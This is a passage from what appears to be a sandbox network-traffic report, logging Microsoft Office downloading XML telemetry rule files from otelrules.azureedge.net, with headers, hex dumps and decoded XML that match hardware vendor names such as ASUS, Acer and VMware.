                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:21 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      12192.168.2.74971813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:22 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:22 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:22 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 486
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                      ETag: "0x8DC582BB344914B"
                                                                                                      x-ms-request-id: 0a3893d3-c01e-0082-33ee-16af72000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185122Z-1657d5bbd482lxwq1dp2t1zwkc00000005100000000101zh
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:22 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      13192.168.2.74971913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:22 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:22 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:22 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 427
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                      ETag: "0x8DC582BA310DA18"
                                                                                                      x-ms-request-id: 915c1ee4-001e-0079-3000-1712e8000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185122Z-1657d5bbd48sdh4cyzadbb37480000000590000000006zzk
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:22 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      14192.168.2.74971713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:22 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:22 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:22 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 407
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                      ETag: "0x8DC582BBAD04B7B"
                                                                                                      x-ms-request-id: 789c8418-601e-0032-5905-17eebb000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185122Z-1657d5bbd48lknvp09v995n790000000050g00000000fnh3
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:22 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      15192.168.2.74972113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:22 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:22 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:22 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 407
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                      ETag: "0x8DC582B9698189B"
                                                                                                      x-ms-request-id: 99ffd5e0-b01e-0053-0101-17cdf8000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185122Z-1657d5bbd48q6t9vvmrkd293mg000000058000000000zmz3
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:22 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      16192.168.2.74972013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:22 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:22 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:22 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 486
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                      ETag: "0x8DC582B9018290B"
                                                                                                      x-ms-request-id: bf7deccb-401e-0064-0f0e-1754af000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185122Z-1657d5bbd482krtfgrg72dfbtn000000051g00000000vpsv
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:22 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      17192.168.2.74972313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:23 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:23 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:23 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 415
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                      ETag: "0x8DC582BA41997E3"
                                                                                                      x-ms-request-id: 27ba9a72-001e-0046-2a01-17da4b000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185123Z-1657d5bbd4824mj9d6vp65b6n400000005fg00000000zbcs
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:23 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      18192.168.2.74972213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:23 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:23 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:23 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 469
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                      ETag: "0x8DC582BBA701121"
                                                                                                      x-ms-request-id: e72ec3ca-501e-005b-2401-17d7f7000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185123Z-1657d5bbd48vhs7r2p1ky7cs5w00000005s0000000007cvz
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:23 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      19192.168.2.74972413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:23 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:23 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:23 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 477
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                      ETag: "0x8DC582BB8CEAC16"
                                                                                                      x-ms-request-id: c2d0a885-201e-0003-7ced-16f85a000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185123Z-1657d5bbd487nf59mzf5b3gk8n00000004yg00000000qpz7
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:23 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      20192.168.2.74972613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:23 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:23 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:23 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 494
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                      ETag: "0x8DC582BB7010D66"
                                                                                                      x-ms-request-id: d3d0b776-b01e-003d-1803-17d32c000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185123Z-1657d5bbd482tlqpvyz9e93p5400000005b0000000010en9
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:23 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      21192.168.2.74972513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:23 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:23 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:23 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 464
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                      ETag: "0x8DC582B97FB6C3C"
                                                                                                      x-ms-request-id: 5a59384b-a01e-0053-3602-178603000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185123Z-1657d5bbd48gqrfwecymhhbfm8000000043g00000000xh28
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:23 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      22192.168.2.74972713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
